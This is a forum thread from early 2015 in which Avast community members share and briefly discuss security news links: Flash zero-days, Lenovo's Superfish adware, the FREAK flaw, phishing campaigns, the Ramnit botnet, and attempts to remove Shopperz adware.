This is probably the reason why Google is officially changing to HTML5 for YouTube. :)
I think they did a while ago, since I could watch youtube videos with Flash disabled.
Adopting HTML5 as the default is a recent decision. More information at:
YouTube drops Flash for HTML5 video as default | The Verge http://www.theverge.com/2015/1/27/7926001/youtube-drops-flash-for-html5-video-default (http://www.theverge.com/2015/1/27/7926001/youtube-drops-flash-for-html5-video-default)
-
CANADA CASTS GLOBAL SURVEILLANCE DRAGNET OVER FILE DOWNLOADS:
https://firstlook.org/theintercept/2015/01/28/canada-cse-levitation-mass-surveillance/
Link article authors: RYAN GALLAGHER AND GLENN GREENWALD.
polonus
-
Market Share Report
https://www.opswat.com/resources/reports/antivirus-and-compromised-device-january-2015#antivirus-vendor-market-share
Keeping A Secure Mobile Device
https://blog.malwarebytes.org/mobile-2/2015/01/keeping-a-secure-mobile-device/?utm_source=Gplus&utm_medium=social
-
Check this out: http://www.crimeflare.com/ and see: http://www.crimeflare.com/cfsites.html
polonus
-
Top result on Google for the phrase "avast online scan" shows this site:
http://www.getavast.net/support/online-scanner (http://www.getavast.net/support/online-scanner)
Everything there screams SCAM to me.
Especially if you wcrool to the bottom where they write:
"Please note we are not an official AVAST website – that you can find at www.avast.com."
Funny thing is, the link for "www.avast.com" leads to "http://send.onenetworkdirect.net/z/25497/CD185233/"
-
Malware hides via Microsoft's Downloadservice BITS: http://community.websense.com/blogs/securitylabs/archive/2015/01/29/new-f0xy-malware-employs-cunning-stealth-amp-trickery.aspx
polonus
-
The Password And You
https://blog.malwarebytes.org/online-security/2015/01/the-password-and-you/?utm_source=Gplus&utm_medium=social
-
@SnowmanDK,
Site has a Moderate Risk status at BrightCloud, rep index yellow 60.
Not flagged here: http://www.scamvoid.com/check/getavast.net
The registrant is Petr Novak -> http://whois.domaintools.com/getavast.net Head of ICT at LMC s.r.o.
Interest in Avast for Mac: http://macforum.cz/viewtopic.php?f=1&t=833
See: https://plus.google.com/117953609589883546929/posts/aTMxPnVjVm2
See: http://www.dnsinspect.com/scamvoid.com/1422715097
hostname: p3nlhg340c1340.shr.prod.phx3.secureserver.net
External link to: https://www.virustotal.com/nl/domain/vassg141.ocsp.omniroot.com/information/
Vuln.: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fwww.getavast.net%2Fxmlrpc.php
Script there found to be benign: http://jsunpack.jeek.org/?report=a97329c7fb69672803283a0bee6679a1718e82af
An avast-fan site, not affiliated with avast but not a rogue site either.
Site security OK: http://sitecheck.sucuri.net/results/www.getavast.net
polonus (volunteer website security analyst and website error-hunter)
-
The Pirate Bay Is Back Online!
http://torrentfreak.com/pirate-bay-back-online-150131/
https://thepiratebay.se/
-
Hi abruptum,
Now hosted in the U.S. of A. by Cloudflare: http://toolbar.netcraft.com/site_report?url=https://thepiratebay.se/
SOA issues: http://dnscheck.pingdom.com/?domain=thepiratebay.se×tamp=1422751579&view=1
pol
-
Trend Micro Discovers New Adobe Flash Zero-Day Exploit Used in Malvertisements
http://blog.trendmicro.com/trendlabs-security-intelligence/trend-micro-discovers-new-adobe-flash-zero-day-exploit-used-in-malvertisements/
-
Trend Micro Discovers New Adobe Flash Zero-Day Exploit Used in Malvertisements
http://blog.trendmicro.com/trendlabs-security-intelligence/trend-micro-discovers-new-adobe-flash-zero-day-exploit-used-in-malvertisements/
Again. :o
This is not funny anymore.
-
Protection via exyension against WEbRTC leaking VPN IP addresses: WebRTC block.
https://chrome.google.com/webstore/detail/webrtc-block/nphkkbaidamjmhfanlpblblcadhfbkdm?hl=en
polonus
-
Trend Micro Discovers New Adobe Flash Zero-Day Exploit Used in Malvertisements
http://blog.trendmicro.com/trendlabs-security-intelligence/trend-micro-discovers-new-adobe-flash-zero-day-exploit-used-in-malvertisements/
Again. :o
This is not funny anymore.
Never was.
If running Firefox, click Menu (three bars upper right)>Addons>Plugins>Adobe Flash (Shockwave Flash 16.0.0.296) or other flash and select 'Ask to activate' so you can control when it runs. One of the many reasons YouTube is now running HTML5 instead of flash. Google Chrome: https://support.google.com/chrome/answer/108086?hl=en (https://support.google.com/chrome/answer/108086?hl=en)
-
Google Chrome update Spam drops CTB Locker/Critroni Ransomware
https://blog.malwarebytes.org/social-engineering/2015/02/google-chrome-update-spam-drops-ctb-lockercritroni-ransomware/?utm_source=Gplus&utm_medium=social
Money Mule Scam Siphons $214Mn Worldwide
http://www.infosecurity-magazine.com/news/money-mule-scam-siphons-214mn/
-
Major Internet Explorer Vulnerability - NOT Patched
http://seclists.org/fulldisclosure/2015/Feb/0
-
Major Internet Explorer Vulnerability - NOT Patched
http://seclists.org/fulldisclosure/2015/Feb/0 (http://seclists.org/fulldisclosure/2015/Feb/0)
Pretty vague since it doesn't state if this is a vulnerability in a specific version or all versions of IE.
-
We live in the Golden Age for Total Surveillance: http://www.theguardian.com/technology/2015/feb/02/pgp-phil-zimmermann-intelligence-agencies-encryption link article author Stuart Dredge
polonus
-
We live in the Golden Age for Total Surveillance: http://www.theguardian.com/technology/2015/feb/02/pgp-phil-zimmermann-intelligence-agencies-encryption (http://www.theguardian.com/technology/2015/feb/02/pgp-phil-zimmermann-intelligence-agencies-encryption) link article author Stuart Dredge
polonus
This shouldn't come as a surprise to anyone has followed this forum for any length of time. :)
"There is no such thing as privacy" :)
-
WinXP market share is going up again?
http://www.netmarketshare.com/report.aspx?qprid=11&qpaf=&qpcustom=Windows+XP&qpcustomb=0
http://www.netmarketshare.com/operating-system-market-share.aspx?qprid=10&qpcustomd=0
-
WinXP market share is going up again?
http://www.netmarketshare.com/report.aspx?qprid=11&qpaf=&qpcustom=Windows+XP&qpcustomb=0
http://www.netmarketshare.com/operating-system-market-share.aspx?qprid=10&qpcustomd=0
Interestingly still higher than win8/8.1 combined. MS is really having a hard time with that dog - It will probably drop much lower when they start giving away win 10 to certain qualifying win7 and win8/8.1 systems.
-
Yes, DavidR, and there are some continents or part of continents, where MS should start spreading the Win10 promotion.
I would start in the land of the Middle Kingdom - 中國/中国 - 中華/中华 .
And I know some more nations where the prevalence of XP is still very substantial.
This could get us better global security.
polonus
-
HanJuan EK fires third Flash Player 0day
https://blog.malwarebytes.org/exploits-2/2015/02/hanjuan-ek-fires-third-flash-player-0day/?utm_source=Gplus&utm_medium=social
-
Read as this link should work: http://arstechnica.com/security/2015/02/serious-bug-in-fully-patched-internet-explorer-puts-user-credentials-at-risk/
IE11 zero-day when going to maliciously crafted pages, use firefox or Google Chrome until MS patches this bug/hole.
polonus
-
(http://www.screencast-o-matic.com/screenshots/u/Lh/1423146803711-65715.png)
Just added to my presentation: Security Is Everyone's Business (https://docs.google.com/document/d/1kCzvKHaOiOgfAk1NuDnko-w0uqpgzj7Yx_LOIet23_Y/edit?usp=sharing)
-
Logging In and Captcha
https://blog.malwarebytes.org/online-security/2015/02/logging-in-and-captcha/?utm_source=Gplus&utm_medium=social
-
Zero-day in the Fancybox-for-WordPress Plugin
http://blog.sucuri.net/2015/02/zero-day-in-the-fancybox-for-wordpress-plugin.html
-
Zero-day in WP CMS - update nowl: http://blog.sucuri.net/2015/02/zero-day-in-the-fancybox-for-wordpress-plugin.htm
and https://wordpress.org/support/topic/possible-malware-2
polonus
-
Malvertising campaign already going on for months: http://www.invincea.com/2015/02/fessleak-the-zero-day-driven-advanced-ransomware-malvertising-campaign/
pol
-
Gamers Targeted with Fake In-Game Comms Apps
https://blog.malwarebytes.org/fraud-scam/2015/02/gamers-targeted-with-fake-in-game-comms-apps/?utm_source=Gplus&utm_medium=social
The Facts about Botnets
https://blog.malwarebytes.org/cyber-crime/2015/02/the-facts-about-botnets/?utm_source=Gplus&utm_medium=social
-
EU-parliament blocks new MS Outlook apps for EU parliament members.
https://blog.winkelmeyer.com/2015/01/warning-microsofts-outlook-app-for-ios-breaks-your-company-security/
Because apps will store your credentials onto USA cloud servers, which some may consider an insecurity.
polonus
-
Is your smart TV to smart?
YOUR SAMSUNG SMARTTV IS SPYING ON YOU
http://www.thedailybeast.com/articles/2015/02/05/your-samsung-smarttv-is-spying-on-you-basically.html
-
Pawn Storm Update: iOS Espionage App Found
http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-update-ios-espionage-app-found/
-
Is your smart TV to smart?
YOUR SAMSUNG SMARTTV IS SPYING ON YOU
http://www.thedailybeast.com/articles/2015/02/05/your-samsung-smarttv-is-spying-on-you-basically.html (http://www.thedailybeast.com/articles/2015/02/05/your-samsung-smarttv-is-spying-on-you-basically.html)
UPDATE 2/6/15 1:59 PM: "Samsung takes consumer privacy very seriously.
In all of our Smart TVs we employ industry-standard security safeguards and practices, including data encryption,
to secure consumers’ personal information and prevent unauthorized collection or use," the company said in a statement
to The Daily Beast. "Voice recognition, which allows the user to control the TV using voice commands, is a Samsung
Smart TV feature, which can be activated or deactivated by the user. The TV owner can also disconnect the TV from the Wi-Fi network."
The same thing can be said for almost any voice command operations.
-
Is your smart TV to smart?
YOUR SAMSUNG SMARTTV IS SPYING ON YOU
http://www.thedailybeast.com/articles/2015/02/05/your-samsung-smarttv-is-spying-on-you-basically.html (http://www.thedailybeast.com/articles/2015/02/05/your-samsung-smarttv-is-spying-on-you-basically.html)
An Update:
Your Samsung SmartTV isn’t spying on you! (http://www.slashgear.com/your-samsung-smarttv-isnt-spying-on-you-09368124/)
(http://cdn.slashgear.com/wp-content/uploads/2015/02/worry-800x420.jpg)
-
Just added to my latest Presentation (https://docs.google.com/document/d/1kCzvKHaOiOgfAk1NuDnko-w0uqpgzj7Yx_LOIet23_Y/edit?usp=sharing):
(http://www.screencast-o-matic.com/screenshots/u/Lh/1423583092229-6928.png)
It didn't take them long to jump on the email scamming trail. Be Careful!
-
Microsoft Security Bulletin Summary for February 2015
https://technet.microsoft.com/en-us/library/security/ms15-feb
-
One single bit to break them all: http://breakingmalware.com/vulnerabilities/one-bit-rule-bypassing-windows-10-protections-using-single-bit/
polonus
-
One single bit to break them all: http://breakingmalware.com/vulnerabilities/one-bit-rule-bypassing-windows-10-protections-using-single-bit/ (http://breakingmalware.com/vulnerabilities/one-bit-rule-bypassing-windows-10-protections-using-single-bit/)
polonus
Which has been fixed if you've applied the latest patch Tuesday updates. :)
-
Sophisticated Phishing using free HTML-5 templates to convince:
https://labs.opendns.com/2015/02/11/paypal-phishing-sophistication-growing/
polonus
-
Sophisticated Phishing using free HTML-5 templates to convince:
https://labs.opendns.com/2015/02/11/paypal-phishing-sophistication-growing/ (https://labs.opendns.com/2015/02/11/paypal-phishing-sophistication-growing/)
polonus
http://www.pcworld.com/article/2883472/many-paypal-lookalike-phishing-websites-taken-offline.html (http://www.pcworld.com/article/2883472/many-paypal-lookalike-phishing-websites-taken-offline.html)
-
Thank you, bob3160, for the update and good they keep an eye on this abuse. ;)
Damian
-
Quote from bob3160:
Which has been fixed if you've applied the latest patch Tuesday updates.
First MS patches came from Redmond, then from India and now land on your computer from Brazil.
polonus
-
Fake AdwCleaner generates money for cybercrime: http://www.bleepingcomputer.com/forums/t/566869/fake-adwcleaner-scareware-generates-thousands-of-dollars-for-scammers/
polonus
-
A New Twist on Tech Support Scams Pop Ups
https://blog.malwarebytes.org/fraud-scam/2015/02/a-new-twist-on-tech-support-scams-pop-ups/?utm_source=Gplus&utm_medium=social
Amazon “Notice: Ticket Number” Phish Seeks Card Details
https://blog.malwarebytes.org/fraud-scam/2015/02/amazon-notice-ticket-number-phish-seeks-card-details/?utm_source=Gplus&utm_medium=social
-
Xplode has now updated AdwCleaner to remove the imposter :)
-
F-Secure Sells Younited Personal Cloud to Synchronoss; Redoubles Security Focus
https://www.f-secure.com/en/web/press_global/news-clippings/-/journal_content/56/1075444/1179552
-
Cyber Espionage on shiniest , debunked for curious readers :)
http://www.kaspersky.com/about/news/virus/2015/equation-group-the-crown-creator-of-cyber-espionage
https://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/
https://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf
-
Find Out If U.K. Spied On You Illegally Via NSA’s Prism, Upstream
http://techcrunch.com/2015/02/16/pi-did-brits-spy/#jM4aqR:T0l
-
Celebrity chef Jamie Oliver’s website hacked, redirects to exploit kit
https://blog.malwarebytes.org/exploits-2/2015/02/celebrity-chef-jamie-olivers-website-hacked-redirects-to-exploit-kit/?utm_source=Gplus&utm_medium=social
-
Lenovo PCs ship with preinstalled adware and root certificate
http://www.ghacks.net/2015/02/19/lenovo-pcs-ship-with-preinstalled-adware-and-root-certificate/
-
Lenovo PCs ship with preinstalled adware and root certificate
http://www.ghacks.net/2015/02/19/lenovo-pcs-ship-with-preinstalled-adware-and-root-certificate/
I can recall something similar from some time ago (can't recall the company making said HDDs) and that was down to new hard drives infected even before installed on new systems.
-
There is some new adware doing the rounds which employs a double driver rootkit. We are hoping that a simple removal process will be found shortly
I have asked for a copy of the dropper so I can send it to Avast
Reference shopperz I have a case now where I am having trouble in removing it.
I have used the following :
Take ownership reg change. This fails to run or change ownership
Changing the driver status in services, permission denied
Combofix cannot delete
AVZ cannot delete
FRST can delete from the recovery console I believe however, the computer MBR became corrupt and all repairs failed. Required a re-install (separate case)
I believe this driver is associated :
R1 bsdriver; C:\Windows\system32\drivers\bsdriver.sys [36344 2015-02-05] ()
But the same deletion/ownership problems as above
There is a possible uninstall file in the folder, I am going to try that next, but do not hold out much hope.
Then against hope I will run TDSSKiller
I will try FRST again from the recovery console and hope the previous MBR problem was a coincidence. But, I have warned the OP
EDIT|: Forgot the link http://www.geekstogo.com/forum/topic/347348-sons-laptop-infected-maladware/page-3#entry2480622 (http://www.geekstogo.com/forum/topic/347348-sons-laptop-infected-maladware/page-3#entry2480622)
From MBAM contact :
We have discovered that Shopperz adware is using two drivers to protect the files from being removed. That means the drivers are used as a watchdogs for the Shopperz files (adware mixed with a rootkit - great...).
-
NSA and GCHQ allegedly hacked sim-vendor: https://firstlook.org/theintercept/2015/02/19/great-sim-heist/
also: https://twitter.com/AndrewDFish/status/568758179154280448
Access to core mobile networks lay open. Just remember the easiness of the blackphone hack (5 minutes) :o
How Gemalto reacted to these revelations on the AEX, a 6% loss:
http://www.beurs.nl/gemalto-koers
polonus
-
Security experts call for an end to new PC crapware installs: http://www.computerworld.com/article/2886978/security-experts-call-for-halt-to-pc-crapware-after-lenovo-debacle.html
polonus
-
Evolve Gamers Hunted by Malware
https://blog.malwarebytes.org/fraud-scam/2015/02/evolve-gamers-hunted-by-malware/?utm_source=Gplus&utm_medium=social
-
Instructions on how to uninstall SuperFish and the certificate
http://support.lenovo.com/us/en/product_security/superfish_uninstall
I don't see detection added to the vps :-\
-
Hi Eddy,
A shame :( really as MS already has the capability to remove the Superphish adware on its virusscanners ->
http://www.microsoft.com/security/scanner/en-us/default.aspx
See: http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan%3aWin32%2fSuperfish.A
polonus
-
Lenovo and the Superfish fiasco
https://blog.malwarebytes.org/privacy-2/2015/02/lenovo-and-the-superfish-fiasco/?utm_source=Gplus&utm_medium=social
-
Hi Para-Noid,
Getting harder and harder to manoeuvre around crap and junk now. We see where that brought us now!
Some good free programs started to be flagged as malcode because the additional junk could not easily enough be circumvented by the average unaware user.
I wish you all an enormous lot of less OpenCandy and what else might come your way bundled.
Hope these marketing cheap money eager mor**ns are finally gonna learn they are shooting their own big feet big time, but it is always hardest for one to admit to their own mistakes/miscalculations ;D
polonus
-
More worrisome words: https://www.eff.org/deeplinks/2015/02/further-evidence-lenovo-breaking-https-security-its-laptops
pol
-
Privdog is Superfish all over again
http://www.ghacks.net/2015/02/23/privdog-is-superfish-all-over-again/
-
Superfish introduction and removal tools and model numbers for Lenovo notebooks that suffered from having Superfish preloaded:
E-Series: E10-30
Flex-Series: Flex2 14, Flex2 15, Flex2 14D, Flex2 15D, Flex2 14 (BTM), Flex2 15 (BTM), Flex 10
G-Series: G410, G510, G40-70, G40-30, G40-45, G50-70, G50-30, G50-45
M-Series: Miix2 - 8, Miix2 - 10, Miix2 - 11
S-Series: S310, S410, S415; S415 Touch, S20-30, S20-30 Touch, S40-70
U-Series: U330P, U430P, U330Touch, U430Touch, U540Touch
Y-Series: Y430P, Y40-70, Y50-70
Yoga-Series: Yoga2-11BTM, Yoga2-11HSW, Yoga2-13, Yoga2Pro-13
Z-Series: Z40-70, Z40-75, Z50-70, Z50-75
Removal tool from the manufacturer: http://support.lenovo.com/us/en/product_security/superfish_uninstall
Information about Superfish: http://www.zdnet.com/article/microsoft-updates-windows-defender-to-remove-superfish-infection/
-
Superfish introduction and removal tools and model numbers for Lenovo notebooks that suffered from having Superfish preloaded:
E-Series: E10-30
Flex-Series: Flex2 14, Flex2 15, Flex2 14D, Flex2 15D, Flex2 14 (BTM), Flex2 15 (BTM), Flex 10
G-Series: G410, G510, G40-70, G40-30, G40-45, G50-70, G50-30, G50-45
M-Series: Miix2 - 8, Miix2 - 10, Miix2 - 11
S-Series: S310, S410, S415; S415 Touch, S20-30, S20-30 Touch, S40-70
U-Series: U330P, U430P, U330Touch, U430Touch, U540Touch
Y-Series: Y430P, Y40-70, Y50-70
Yoga-Series: Yoga2-11BTM, Yoga2-11HSW, Yoga2-13, Yoga2Pro-13
Z-Series: Z40-70, Z40-75, Z50-70, Z50-75
Removal tool from the manufacturer: http://support.lenovo.com/us/en/product_security/superfish_uninstall (http://support.lenovo.com/us/en/product_security/superfish_uninstall)
Information about Superfish: http://www.zdnet.com/article/microsoft-updates-windows-defender-to-remove-superfish-infection/ (http://www.zdnet.com/article/microsoft-updates-windows-defender-to-remove-superfish-infection/)
I wouldn't be a bit surprised if the removal tool was created at the same time that the spying started. Just waiting to be released
when someone was caught with their hands in the cookie jar. :)
-
LOL ;D
-
Vulnerability Note VU#529496
Komodia Redirector with SSL Digestor fails to properly validate SSL and installs non-unique root CA certificates and private keys
http://www.kb.cert.org/vuls/id/529496
-
Windows SSL Interception Gone Wild
https://www.facebook.com/notes/protect-the-graph/windows-ssl-interception-gone-wild/1570074729899339
-
BEWARE SCAM!!!!!
http://www.vg247.com/2015/02/23/darkest-dungeon-windows-8-store-scam/
-
The new Google Fuzzing Bots are doing overtime and with good results:
http://googleonlinesecurity.blogspot.nl/2015/02/more-protection-from-unwanted-software.html
polonus
-
Superfish Update - An Open Letter from Lenovo CTO Peter Hortensius
http://news.lenovo.com/article_display.cfm?article_id=1932
-
Superfish Update - An Open Letter from Lenovo CTO Peter Hortensius
http://news.lenovo.com/article_display.cfm?article_id=1932
Talk about trying to understate the seriousness of the issue:
This software frustrated some users without adding value to the experience so we were in the process of removing it from our preloads.
It "frustrated some users" a real master of understatement at work.
I though when there was this big a screw up the got a public flogging - or worse.
-
Hi DavidR,
If that is 57.000 users I would not like to be among them,
polonus
-
maybe something good will come out of it
Now, we are in the midst of developing a concrete plan to address software vulnerabilities and security with defined actions that we will share by the end of the week. What I can say about this today is that we are exploring a wide range of options that include:
-creating a cleaner PC image (the operating system and software that is on your device right out of the box);
-working directly with users, privacy/security experts and others to create the right preload strategy quickly;
-and soliciting and assessing the opinions of even our harshest critics in evaluating our products going-forward.
a clean PC with only OS?...no crap software :)
-
Melih from Comodo also defends his position regarding Privdog:
https://forums.comodo.com/ssl-certificate/comodo-under-attack-t70990.0.html;msg798365#msg798365 (https://forums.comodo.com/ssl-certificate/comodo-under-attack-t70990.0.html;msg798365#msg798365)
-
maybe something good will come out of it
Building trust again will take some time I fear - Despite their assurances, I know Lenovo is off my list for some time. When HP abandoned updating printer drivers for a new OS, my A3 business grade printer effectively became an expensive paper weight. I vowed never to purchase another HP product and that was over 10 years ago.
Sony is in a similar boat, after their rootkit fiasco, I vowed never to buy another Sony product and I haven't. Boy is that hard given the product range they have.
Now, we are in the midst of developing a concrete plan to address software vulnerabilities and security with defined actions that we will share by the end of the week. What I can say about this today is that we are exploring a wide range of options that include:
-creating a cleaner PC image (the operating system and software that is on your device right out of the box);
-working directly with users, privacy/security experts and others to create the right preload strategy quickly;
-and soliciting and assessing the opinions of even our harshest critics in evaluating our products going-forward.
a clean PC with only OS?...no crap software :)
Well they are still going to have an AV on board according to their article as the say one of the first things that will happen on new systems is to run a scan to ensure there is no Superfish - or presumably any other malware.
-
Hi DavidR,
We just could have be waiting for this outcome, at long last the eager scraping for the easy bundling money is now backfiring greartly.
Will they ever learn they cannot lead the user to that same river again and again? Always the hardest thing is to recognize your own mistakes and learn from them. Not a lot of marketeers are ready to learn, only a few can. If that is so, they have to learn the hard way.
I do not pity them. Arrogance, dear DavidR, arrogance everywhere and contempt for the end-user/customer that they cannot live without.
Damian
-
Superfish Fallout Raises Privacy Concern Over Parental Control Apps
https://blog.malwarebytes.org/privacy-2/2015/02/superfish-fallout-raises-privacy-concern-over-parental-control-apps/ (https://blog.malwarebytes.org/privacy-2/2015/02/superfish-fallout-raises-privacy-concern-over-parental-control-apps/)
-
Hi mchain,
More related SDK android malvertising.
Avast should provide proper Network Protection for it,
a typical Network Shield protection issue here.
Read: http://www.hotforsecurity.com/blog/android-malvertising-scam-promises-antivirus-delivers-lifetime-subscription-to-ringtones-7157.html link article author: Lorezana Botezanu
So this sort of malcode has been with us since 2013 and now it went from bad to worse apparently.
In Avast we trust, unless we test.
polonus
-
Ramnit botnet was taken down by Europol, a cookie and password stealing botnet: http://blogs.technet.com/b/mmpc/archive/2011/05/10/little-red-ramnit-my-what-big-eyes-you-have-grandma.aspx
polonus
-
A not so bright ;D cybercriminal that infested himself: https://blogs.rsa.com/zeus-toolkit-infected-ramnit-worm/
polonus
-
Advertisment-data collected by drone: https://adnear.com/february2015/experimenting-with-drones-for-data-collection.php
polonus
-
Advertisment-data collected by drone: https://adnear.com/february2015/experimenting-with-drones-for-data-collection.php
polonus
Some of the UK Telecom/Mobile/Internet providers are already considering the use of drones to fill in gaps in the mast network using wifi capable drone repeaters.
-
I am with you there and in the light of the alleged Gemalto heist in the Netherlands, you should be extra watchful when you now come near Dutch Parliament in The Hague for instance- all parliament members will get free new Vodaphone sim cards handed out. We normal citizens have to pay approx. 20 euro's to get a new one. Read: http://electrospaces.blogspot.nl/2015/02/nsa-and-gchq-stealing-sim-card-keys-few.html
polonus
-
Security Advisory – WP-Slimstat 3.9.5 and lower
http://blog.sucuri.net/2015/02/security-advisory-wp-slimstat-3-9-5-and-lower.html
-
What is malvertising?
https://blog.malwarebytes.org/malvertising-2/2015/02/what-is-malvertising/?utm_source=Gplus&utm_medium=social
Philippine .Gov Compromised by Anti-ISIS Defacement, Phishing
https://blog.malwarebytes.org/hacking-2/2015/02/philippine-gov-compromised-by-anti-isis-defacement-phishing/?utm_source=Gplus&utm_medium=social
-
Google will set out slow sites: /google-testing-red-slow-label-search-results-slower-sites-215483
Link author Search Engine Land's Barry Swartz.
But google sites themselves are slow: https://plus.google.com/+NeerajKumarKNKayastha/posts/AxqES5eq6Gg
link article by K Neeraj Kayastha SEO expert.
polonus
-
Almost 50% increase in reported vulnerabilities as non-Windows operating systems lead the table
https://www.virusbtn.com/blog/2015/02_25.xml
-
Coordinated action takes down Ramnit botnet infrastructure
https://www.virusbtn.com/blog/2015/02_26.xml
-
Hi Pondus,
Did you miss this? Re: https://forum.avast.com/index.php?topic=52252.msg1187513#msg1187513
Damian
-
Websites hacked by a review, alas we are not being told how the websites were being compromised: https://blog.shodan.io/tracking-hacked-websites/
Just have to wait for the appropriate ninja fw report? https://www.google.nl/webhp?sourceid=chrome-instant&ion=1&espv=2&es_th=1&ie=UTF-8#q=ninja+firewall+report
What queries may deliver as results on Shodan, see example
-> https://www.shodan.io/search?query=PHP%2F5.3.28-1~dotdeb.0
(the limit is just your fantasy - mind you have recent day's results - chikagoro)
polonus
-
useful site to detect Superfish, Komodia, PrivDog and similar criplewares disabling SSL
https://filippo.io/Badfish/
-
Deceiving cPanel ‘Account Suspended’ page serves exploits
https://blog.malwarebytes.org/exploits-2/2015/02/deceiving-cpanel-account-suspended-page-serves-exploits/?utm_source=Gplus&utm_medium=social
Netflix Phish Rehash Polices Its Visitors
https://blog.malwarebytes.org/fraud-scam/2015/02/netflix-phish-rehash-polices-its-visitors/?utm_source=Gplus&utm_medium=social
It's coming to the point where no website is entirely safe!
-
Lenovo Swears All Its Windows 10 PCs Will Be Completely Clean
http://news.softpedia.com/news/Lenovo-Swears-All-Its-Windows-10-PCs-Will-Be-Completely-Clean-474514.shtml
-
@Para-Noid and others,
Certification, what we can still trust and what we cannot trust.
Read here about CrazyDomains absolute incompetence...and the shivers will go down your backbone: http://forums.whirlpool.net.au/archive/1637512
and also read this about new computers and junk - do a complete re-install: https://www.eff.org/deeplinks/2015/02/dear-software-vendors-please-stop-trying-intercept-your-customers-encrypted
polonus
-
Paranoia Personified - If all of this worries you,
Stop Using The Internet. :)
-
Lenovo promises bloatware-free PCs, free McAfee subscriptions for Superfish victims
http://www.extremetech.com/computing/199997-lenovo-promises-bloatware-free-pcs-free-mcafee-subscriptions-for-superfish-victims
-
MS pays Google in the bundle-war to get his apps prominently on Android., but also cashes in: http://www.theverge.com/2013/4/17/4233468/microsoft-and-foxconn-sign-android-chrome-patent-licensing-deal
pol
-
European Europol action against Ramnit botnet became a fail: http://news.drweb.com/show/?i=9310&lng=en&c=5
polonus
-
Antivirus Maker Avast Is Latest Overseas Tech Firm Blocked In China
http://techcrunch.com/2015/03/02/avast-blocked-in-china/
-
Google is going to decide what information will be trustworthy: http://arxiv.org/abs/1502.03519v1
Link article poster = Xin Luna Dong.
The future for alternative information media websites and even satirical websites seems bleak.
The days of BigBrother's newspeak to arrive?
polonus
-
Weak encryption in SSL comes back to bite us: http://www.washingtonpost.com/blogs/the-switch/wp/2015/03/03/freak-flaw-undermines-security-for-apple-and-google-users-researchers-discover/
I stumbled upon this because our forum member, Eddy, made me aware of this threat: https://freakattack.com/
Thanks. Eddy, for the heads up on this.
So Mozilla came up with this: https://mozilla.github.io/server-side-tls/ssl-config-generator/
Here you see such a weak encryption site being alerted: https://ssltools.websecurity.symantec.com/checker/views/certCheck.jsp (check: librus.pl)
Hi folks, the world of Interwebs becomes a more and more insecure place for us. ;D
polonus
-
A Week in Security (Feb 22 – 28)
https://blog.malwarebytes.org/online-security/2015/03/a-week-in-security-feb-22-28/?utm_source=Gplus&utm_medium=social
Yet Another Cleaner, Yet Another Stealer
https://blog.malwarebytes.org/fraud-scam/2015/03/yet-another-cleaner-yet-another-stealer/?utm_source=Gplus&utm_medium=social
-
I have been removing YAC for nearly a year now :)
-
Dear avast support forum users.
Threat of being tracked, where you least expect it. Look before you leap - always!
Aware of our forum members DavidR's worries about HTTPS-Everywhere and my analyzing of HTTPS Everywhere re-writes, I did some research on additional tracker threats where one should least expect it,
namely on a Dutch zimbra-driven https webmail website.
The results were shocking, folks. For more info read here:
https://forum.avast.com/index.php?topic=166044.msg1190258#msg1190258 and here: https://forum.avast.com/index.php?topic=167274.0
Who wants to read more and wants to explore these issues themselves, read my posting here:
https://forum.avast.com/index.php?topic=166044.msg1190259#new
polonus (volunteer website security analyst and website error-hunter)
-
New security coming to Mozilla's firefox: https://blog.mozilla.org/security/2015/03/03/revoking-intermediate-certificates-introducing-onecrl/
polonus
-
Defaced websites form an extended risk to also become infested with malware
http://killmalware.com/ gives a lot of new defaced websites.
These websites should also be checked against malcode.
polonus
-
Google does not want to respect European law decisions considering the Right To Be Forgotten and therefore makes it harder now to reach their dot com pages from outside the US, Read: http://searchengineland.com/google-harder-to-reach-outside-us-215845 link article author = Danny Sullivan.
US criticism: http://www.nytimes.com/2015/02/04/opinion/europes-expanding-right-to-be-forgotten.html?_r=0
polonus
-
Does Google quietly help NSA by backing away from encryption by default, seems so : http://arstechnica.com/gadgets/2015/03/google-quietly-backs-away-from-encrypting-new-lollipop-devices-by-default/
polonus
P.S. with an interesting discussion on the why's: http://www.reddit.com/r/Android/comments/2xoo3v/google_quietly_backs_away_from_encrypting_new/
D
-
Was it all worth it? Re: http://www.forbes.com/sites/thomasbrewster/2015/02/27/lenovo-got-very-little-fr
Link article author = Thomas Fox-Brewster
polonus
-
Stop!t: The Newest App To Curb Cyberbullying
https://blog.malwarebytes.org/online-security/2015/03/stopt-the-newest-app-to-curb-cyberbullying/?utm_source=Gplus&utm_medium=social
Bogus Search Engine Leads to Exploits
https://blog.malwarebytes.org/online-security/2015/02/bogus-search-engine-leads-to-exploits/?utm_source=Gplus&utm_medium=social
I use Google+ to get these notifications.
-
Microsoft OS's also vulnerable for the Freak bug.
https://technet.microsoft.com/en-us/library/security/3046015
-
Microsoft Windows vulnerable to 'FREAK' encryption flaw too
http://www.cnet.com/news/windows-vulnerable-to-freak-encryption-flaw-too/
-
uTorrent Quietly Installs Cryptocurrency Miner, Users Complain
http://torrentfreak.com/utorrent-quietly-installs-riskware-bitcoin-miner-users-report-150306/
uTorrent bundles Bitcoin Miner, time for some alternatives
http://www.ghacks.net/2015/03/06/utorrent-bundles-bitcoin-miner-time-for-some-alternatives/
-
Hi abruptum,
This now only available via Google Cache: https://webcache.googleusercontent.com/search?q=cache:ESJf5_i1apQJ:forum.utorrent.com/topic/95041-warning-epicscale-riskware-silently-installed-with-latest-utorrent/+&cd=1&hl=nl&ct=clnk&gl=nl also see: http://i.imgur.com/ohDf3C1.png
polonus
-
A question about something I do not understand?
I see sites that are being banned for PHISHing also by Google Safebrowsing.
Why are these same sites NOT banned from the Google Adsense Program?
Like to see an example: http://vnseo.com/497-health.slim-figure-for-you.org
Anyone?
polonus
-
Just a guess...
Two different departments, not communicating with each-other.
-
A question about something I do not understand?
I see sites that are being banned for PHISHing also by Google Safebrowsing.
Why are these same sites NOT banned from the Google Adsense Program?
Like to see an example: http://vnseo.com/497-health.slim-figure-for-you.org
Anyone?
Best, you ask Google. ;)
-
Avast is definitely alerting the site.
-
Alert Confirmed:
-
Attacks with malicious macros concealed in XML files :
